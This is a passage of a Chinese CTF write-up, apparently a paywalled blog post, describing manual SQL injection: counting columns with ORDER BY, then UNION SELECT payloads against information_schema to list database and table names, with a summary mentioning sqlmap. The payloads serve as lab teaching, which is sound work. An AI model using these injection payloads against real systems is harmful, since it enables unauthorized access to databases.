解法1——手注
我们启动环境之后

根据题目指示我们输入一个1

然后我们使用order by 语句查询有多少列

有两列
然后我们可以通过 联合查询 查库名 表名 列名
查询库名
-1 union select 1,group_concat(schema_name) from information_schema.schemata

查询表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

文章介绍了两种解题方法,一种是手动利用SQL命令查询数据库的库名、表名和列名,最终获取flag;另一种是使用SQLmap工具,通过指定URL自动进行数据库探测、表名和列名的爆破,最终揭示flag。
最低0.47元/天 解锁文章
3655

被折叠的 条评论
为什么被折叠?



